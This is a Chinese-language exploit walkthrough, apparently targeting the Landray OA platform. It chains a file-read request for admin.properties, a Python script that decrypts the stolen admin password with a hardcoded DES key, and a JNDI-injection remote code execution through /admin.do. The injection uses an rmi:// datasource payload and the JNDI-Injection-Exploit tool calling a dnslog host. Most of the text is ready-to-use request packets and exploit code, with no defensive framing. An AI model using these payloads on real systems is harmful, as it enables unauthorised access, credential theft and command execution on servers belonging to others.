自行搭建环境:

image

漏洞路径:

1.文件读取

/sys/ui/extend/varkind/custom.jsp

2.rce

/admin.do

漏洞验证:

读取管理员密码配置文件得到加密的管理员密码

image

数据包:

1
2
3
4
5
6
7
8
9
10
11
12
13
POST //sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 192.168.1.88:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 90

var=%7B%22body%22%3A%7B%22file%22%3A%22%2FWEB-INF%2FKmssConfig%2Fadmin.properties%22%7D%7D

对秘密的密码进行解密得到明文密码

image

代码已集成在下面的脚本中

使用密码登录管理后台

http://192.168.1.88:8080/admin.do

image
image

下载利用工具

https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

在服务器搭建漏洞利用工具进行监听

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "ping ldycd7.dnslog.cn" -A 192.168.1.1

image

发送利用数据包(带上登录后台的cookie)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /admin.do HTTP/1.1
Host: xx.xx.xx.xx
Cookie: JSESSIONID=011EBEEDF3323F7CFFCB31BF42B48B53
Content-Length: 60
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90", "Google Chrome";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36
Origin:
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

method=testDbConn&datasource=rmi://xx.xx.xx.xx:1099/xxxxx

成功执行命令

image

获取密文并解密脚本

image

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
import requests
import sys
import re
from Crypto.Cipher import DES
import base64
requests.packages.urllib3.disable_warnings()

proxy = {'http': '127.0.0.1:8080', 'https': '127.0.0.1:8080'}

class EncryptDate:
def __init__(self, key):
self.key = key
self.length = DES.block_size
self.aes = DES.new(self.key, DES.MODE_ECB)
self.unpad = lambda date: date[0:-ord(date[-1])]

def pad(self, text):
count = len(text.encode('utf-8'))
print(count)
add = self.length - (count % self.length)
print(add)
entext = text + (chr(add) * add)
print(entext)
return entext

def decrypt(self, decrData): # 解密函数
print('==========>>密文解密中')
res = base64.decodebytes(decrData.encode("utf8"))
msg = self.aes.decrypt(res).decode("utf8")
print('==========>>解密成功admin的密码为: '+msg)

def Landraypass(url):
urllist = url+'/sys/ui/extend/varkind/custom.jsp'
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate",
"DNT": "1", "Connection": "close", "Upgrade-Insecure-Requests": "1",
"Content-Type": "application/x-www-form-urlencoded"}
data = {"var": "{\"body\":{\"file\":\"/WEB-INF/KmssConfig/admin.properties\"}}"}
passlist = requests.post(urllist, headers=headers, proxies=proxy, data=data)
print('==========>>正在抓取DES密文')
passDes = re.findall('(?<=password = )(.*?)(?=\\\\r)',passlist.text,re.I)
if len(passDes) == 0 :
print('==========!!:抓取密码失败可进行手动测试确认')
else:
passDeslist = passDes[0]
print('==========>>密文抓取成功: '+passDeslist)
cr = EncryptDate(b'kmssAdmi')
cr.decrypt(passDeslist)

if __name__ == '__main__':
if (len(sys.argv) == 2):
url = sys.argv[1]
Landraypass(url)
else:
print("python3 Landraypass.py http://xx.xx.xx.xx")